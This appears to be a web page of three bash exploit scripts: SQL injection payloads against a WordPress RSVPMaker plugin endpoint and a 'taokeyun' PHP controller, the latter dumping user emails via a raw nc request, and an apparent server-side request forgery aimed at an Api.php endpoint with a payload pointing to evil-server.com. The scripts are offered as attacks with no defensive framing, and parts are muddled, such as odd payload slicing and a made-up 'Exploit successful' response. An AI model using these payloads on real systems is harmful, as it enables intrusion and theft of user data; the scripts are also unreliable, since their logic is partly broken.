<pre><code>#!/bin/bash<br /><br /># Set the URL of the website running the vulnerable plugin<br />url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"<br /><br /># Set the number of columns in the query<br />columns=5<br /><br />response=$(curl -s "$url")<br />query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')<br /><br />payload="' UNION SELECT 1,2,3,4,5-- "<br /><br /># Test the query with different numbers of columns<br />for i in $(seq 1 $columns)<br />do<br /> query_with_payload="${query%?*}?${payload:0:i}${query#*?}"<br /> curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"<br /> if [ $? -eq 0 ]<br /> then<br /> echo "Vulnerability confirmed with $i columns"<br /> break<br /> fi<br />done<br /></code></pre>
<pre><code>#!/bin/bash<br /><br /># Variables<br />url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"<br />cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"<br /><br /># Construct the request<br />request="POST $url HTTP/1.1\r\n"<br />request+="Content-Type: application/x-www-form-urlencoded\r\n"<br />request+="Content-Length: $((${#cid}+15))\r\n\r\n"<br />request+="$cid"<br /><br /># Send the request<br />(echo -e "$request") | nc example.com 80<br /></code></pre>
<pre><code>#!/bin/bash<br /><br /># Set target URL and payload<br />target_url="http://example.com/application/pay/controller/Api.php"<br />payload="url=http://evil-server.com/exploit"<br /><br /># Send the malicious request<br />response=$(curl -s -X POST -d "$payload" "$target_url")<br /><br /># Check if the exploit was successful<br />if echo "$response" | grep -q "Exploit successful"; then<br /> echo "Exploit succeeded"<br />else<br /> echo "Exploit failed"<br />fi<br /><br /># Example payload and response<br />payload="url=http://evil-server.com/exploit"<br />response="HTTP/1.1 200 OK<br />Server: nginx/1.14.0 (Ubuntu)<br />Date: Mon, 01 Dec 2024 20:23:43 GMT<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 25<br />Connection: keep-alive<br /><br />Exploit successful"<br /></code></pre>